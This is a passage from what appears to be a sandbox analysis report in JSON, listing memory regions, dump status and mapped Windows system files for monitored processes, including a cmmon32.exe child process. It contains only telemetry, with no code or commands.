55779327, "entry_point": 0, "filename": null, "id": "region_1222", "name": "pagefile_0x0000000003530000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 55771136, "timestamp": "00:01:06.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 55836672, "type": "region", "version": 1 }, "end_va": 56098815, "entry_point": 0, "filename": null, "id": "region_1223", "name": "private_0x0000000003540000", "norm_filename": null, "region_type": "private_memory", "start_va": 55836672, "timestamp": "00:01:06.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 56098816, "type": "region", "version": 1 }, "end_va": 56107007, "entry_point": 0, "filename": null, "id": "region_1224", "name": "pagefile_0x0000000003580000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 56098816, "timestamp": "00:01:06.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 56164352, "type": "region", "version": 1 }, "end_va": 56168447, "entry_point": 56164352, "filename": "\\Windows\\System32\\oleaccrc.dll", "id": "region_1225", "name": "oleaccrc.dll", "norm_filename": "c:\\windows\\system32\\oleaccrc.dll", "region_type": "memory_mapped_file", "start_va": 56164352, "timestamp": "00:01:06.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 56229888, "type": "region", "version": 1 }, "end_va": 56238079, "entry_point": 0, "filename": null, "id": "region_1226", "name": "pagefile_0x00000000035a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 56229888, "timestamp": "00:01:06.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 28672, "start_va": 56295424, "type": "region", "version": 1 }, "end_va": 56324095, "entry_point": 56295424, "filename": "\\Windows\\System32\\en-US\\bthprops.cpl.mui", "id": "region_1227", "name": "bthprops.cpl.mui", "norm_filename": "c:\\windows\\system32\\en-us\\bthprops.cpl.mui", "region_type": "memory_mapped_file", "start_va": 56295424, "timestamp": "00:01:06.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 56360960, "type": "region", "version": 1 }, "end_va": 56623103, "entry_point": 0, "filename": null, "id": "region_1228", "name": "private_0x00000000035c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 56360960, "timestamp": "00:01:06.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 56623104, "type": "region", "version": 1 }, "end_va": 56631295, "entry_point": 0, "filename": null, "id": "region_1229", "name": "pagefile_0x0000000003600000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 56623104, "timestamp": "00:01:06.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 56688640, "type": "region", "version": 1 }, "end_va": 56696831, "entry_point": 0, "filename": null, "id": "region_1230", "name": "pagefile_0x0000000003610000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 56688640, "timestamp": "00:01:06.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 56754176, "type": "region", "version": 1 }, "end_va": 56770559, "entry_point": 56754176, "filename": "\\Windows\\System32\\en-US\\prnfldr.dll.mui", "id": "region_1231", "name": "prnfldr.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\prnfldr.dll.mui", "region_type": "memory_mapped_file", "start_va": 56754176, "timestamp": "00:01:06.786", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001232-addr_0x0000000003630000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_210", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 56819712, "type": "region", "version": 1 }, "end_va": 57081855, "entry_point": 0, "filename": null, "id": "region_1232", "name": "private_0x0000000003630000", "norm_filename": null, "region_type": "private_memory", "start_va": 56819712, "timestamp": "00:01:06.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 69632, "start_va": 57081856, "type": "region", "version": 1 }, "end_va": 57151487, "entry_point": 57081856, "filename": "\\Windows\\System32\\en-US\\netshell.dll.mui", "id": "region_1233", "name": "netshell.dll.mui", "norm_filename": "c:\\windows\\system32\\en-us\\netshell.dll.mui", "region_type": "memory_mapped_file", "start_va": 57081856, "timestamp": "00:01:06.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 57212928, "type": "region", "version": 1 }, "end_va": 57475071, "entry_point": 0, "filename": null, "id": "region_1234", "name": "private_0x0000000003690000", "norm_filename": null, "region_type": "private_memory", "start_va": 57212928, "timestamp": "00:01:06.787", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001235-addr_0x00000000036d0000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_211", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 57475072, "type": "region", "version": 1 }, "end_va": 57737215, "entry_point": 0, "filename": null, "id": "region_1235", "name": "private_0x00000000036d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 57475072, "timestamp": "00:01:06.787", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 57737216, "type": "region", "version": 1 }, "end_va": 58785791, "entry_point": 57737216, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_32.db", "id": "region_1236", "name": "thumbcache_32.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_32.db", "region_type": "memory_mapped_file", "start_va": 57737216, "timestamp": "00:01:06.787", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 58785792, "type": "region", "version": 1 }, "end_va": 59834367, "entry_point": 58785792, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_96.db", "id": "region_1237", "name": "thumbcache_96.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_96.db", "region_type": "memory_mapped_file", "start_va": 58785792, "timestamp": "00:01:06.787", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 59834368, "type": "region", "version": 1 }, "end_va": 60882943, "entry_point": 59834368, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_256.db", "id": "region_1238", "name": "thumbcache_256.db", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_256.db", "region_type": "memory_mapped_file", "start_va": 59834368, "timestamp": "00:01:06.787", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001264-addr_0x0000000005a00000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_212", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 94371840, "type": "region", "version": 1 }, "end_va": 94633983, "entry_point": 0, "filename": null, "id": "region_1264", "name": "private_0x0000000005a00000", "norm_filename": null, "region_type": "private_memory", "start_va": 94371840, "timestamp": "00:01:06.796", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001267-addr_0x0000000005b40000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_213", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 95682560, "type": "region", "version": 1 }, "end_va": 95944703, "entry_point": 0, "filename": null, "id": "region_1267", "name": "private_0x0000000005b40000", "norm_filename": null, "region_type": "private_memory", "start_va": 95682560, "timestamp": "00:01:06.797", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001432-addr_0x000000007ffa1000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_214", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147094528, "type": "region", "version": 1 }, "end_va": 2147098623, "entry_point": 0, "filename": null, "id": "region_1432", "name": "private_0x000000007ffa1000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147094528, "timestamp": "00:01:07.247", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001437-addr_0x000000007ffa6000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_215", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147115008, "type": "region", "version": 1 }, "end_va": 2147119103, "entry_point": 0, "filename": null, "id": "region_1437", "name": "private_0x000000007ffa6000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147115008, "timestamp": "00:01:07.248", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001438-addr_0x000000007ffa7000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_216", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147119104, "type": "region", "version": 1 }, "end_va": 2147123199, "entry_point": 0, "filename": null, "id": "region_1438", "name": "private_0x000000007ffa7000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147119104, "timestamp": "00:01:07.249", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000007-region_00001448-addr_0x000000007ffd3000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_217", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147299328, "type": "region", "version": 1 }, "end_va": 2147303423, "entry_point": 0, "filename": null, "id": "region_1448", "name": "private_0x000000007ffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147299328, "timestamp": "00:01:07.251", "type": "region", "version": 1 } ], "terminate_reason": "timeout", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\System32\\cmmon32.exe\"", "filename": "c:\\windows\\system32\\cmmon32.exe", "id": "proc_8", "image_name": "cmmon32.exe", "monitor_reason": "child_process", "monitored_id": 8, "origin_monitor_id": 7, "ref_parent_process": { "ref_id": "proc_7", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000008-region_00001464-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_219", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1464", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:10.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1465", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:10.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": "region_1466", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:10.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 172032, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 499711, "entry_point": 0, "filename": null, "id": "region_1467", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:10.513", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2424831, "entry_point": 0, "filename": null, "id": "region_1468", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:10.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 15663104, "type": "region", "version": 1 }, "end_va": 15716351, "entry_point": 0, "filename": null, "id": "region_1469", "name": "pagefile_0x0000000000ef0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 15663104, "timestamp": "00:01:10.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1995767808, "type": "region", "version": 1 }, "end_va": 1997062143, "entry_point": 1995767808, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1470", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1995767808, "timestamp": "00:01:10.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 1998127104, "type": "region", "version": 1 }, "end_va": 1998131199, "entry_point": 1998127104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1471", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 1998127104, "timestamp": "00:01:10.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1472", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:01:10.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147328000, "type": "region", "version": 1 }, "end_va": 2147332095, "entry_point": 0, "filename": null, "id": "region_1473", "name": "private_0x000000007ffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147328000, "timestamp": "00:01:10.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1474", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:01:10.515", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1475", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:10.541", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 720896, "type": "region", "version": 1 }, "end_va": 1769471, "entry_point": 0, "filename": null, "id": "region_1476", "name": "private_0x00000000000b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 720896, "timestamp": "00:01:10.542", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2424832, "type": "region", "version": 1 }, "end_va": 2846719, "entry_point": 2424832, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1477", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2424832, "timestamp": "00:01:10.542", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 819200, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 3702783, "entry_point": 0, "filename": null, "id": "region_1478", "name": "pagefile_0x00000000002c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2883584, "timestamp": "00:01:10.542", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 1864761344, "type": "region", "version": 1 }, "end_va": 1864818687, "entry_point": 1864761344, "filename": "\\Windows\\System32\\cmutil.dll", "id": "region_1479", "name": "cmutil.dll", "norm_filename": "c:\\windows\\system32\\cmutil.dll", "region_type": "memory_mapped_file", "start_va": 1864761344, "timestamp": "00:01:10.542", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1952382976, "type": "region", "version": 1 }, "end_va": 1952419839, "entry_point": 1952382976, "filename": "\\Windows\\System32\\version.dll", "id": "region_1480", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 1952382976, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1965424640, "type": "region", "version": 1 }, "end_va": 1965727743, "entry_point": 1965424640, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1481", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1965424640, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 659456, "start_va": 1967259648, "type": "region", "version": 1 }, "end_va": 1967919103, "entry_point": 1967259648, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_1482", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1967259648, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1967980544, "type": "region", "version": 1 }, "end_va": 1968635903, "entry_point": 1967980544, "filename": "\\Windows\\System32\\advapi32.dll", "id": "region_1483", "name": "advapi32.dll", "norm_filename": "c:\\windows\\system32\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1967980544, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1984299008, "type": "region", "version": 1 }, "end_va": 1984339967, "entry_point": 1984299008, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_1484", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1984299008, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 319488, "start_va": 1985806336, "type": "region", "version": 1 }, "end_va": 1986125823, "entry_point": 1985806336, "filename": "\\Windows\\System32\\gdi32.dll", "id": "region_1485", "name": "gdi32.dll", "norm_filename": "c:\\windows\\system32\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1985806336, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1986134016, "type": "region", "version": 1 }, "end_va": 1986957311, "entry_point": 1986134016, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1486", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1986134016, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1988427776, "type": "region", "version": 1 }, "end_va": 1989070847, "entry_point": 1988427776, "filename": "\\Windows\\System32\\usp10.dll", "id": "region_1487", "name": "usp10.dll", "norm_filename": "c:\\windows\\system32\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1988427776, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989185535, "entry_point": 1989083136, "filename": "\\Windows\\System32\\sechost.dll", "id": "region_1488", "name": "sechost.dll", "norm_filename": "c:\\windows\\system32\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 868352, "start_va": 1992359936, "type": "region", "version": 1 }, "end_va": 1993228287, "entry_point": 1992359936, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1489", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1992359936, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1994653696, "type": "region", "version": 1 }, "end_va": 1995358207, "entry_point": 1994653696, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_1490", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1994653696, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2137980928, "type": "region", "version": 1 }, "end_va": 2139029503, "entry_point": 0, "filename": null, "id": "region_1491", "name": "pagefile_0x000000007f6f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2137980928, "timestamp": "00:01:10.544", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 1984364544, "type": "region", "version": 1 }, "end_va": 1984491519, "entry_point": 1984364544, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_1492", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1984364544, "timestamp": "00:01:10.547", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1991507968, "type": "region", "version": 1 }, "end_va": 1992343551, "entry_point": 1991507968, "filename": "\\Windows\\System32\\msctf.dll", "id": "region_1493", "name": "msctf.dll", "norm_filename": "c:\\windows\\system32\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1991507968, "timestamp": "00:01:10.547", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_1494", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:10.598", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 524288, "type": "region", "version": 1 }, "end_va": 532479, "entry_point": 0, "filename": null, "id": "region_1495", "name": "pagefile_0x0000000000080000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 524288, "timestamp": "00:01:10.598", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 589824, "type": "region", "version": 1 }, "end_va": 598015, "entry_point": 589824, "filename": "\\Windows\\System32\\en-US\\cmmon32.exe.mui", "id": "region_1496", "name": "cmmon32.exe.mui", "norm_filename": "c:\\windows\\system32\\en-us\\cmmon32.exe.mui", "region_type": "memory_mapped_file", "start_va": 589824, "timestamp": "00:01:10.598", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 655360, "type": "region", "version": 1 }, "end_va": 659455, "entry_point": 0, "filename": null, "id": "region_1497", "name": "private_0x00000000000a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 655360, "timestamp": "00:01:10.599", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1769472, "type": "region", 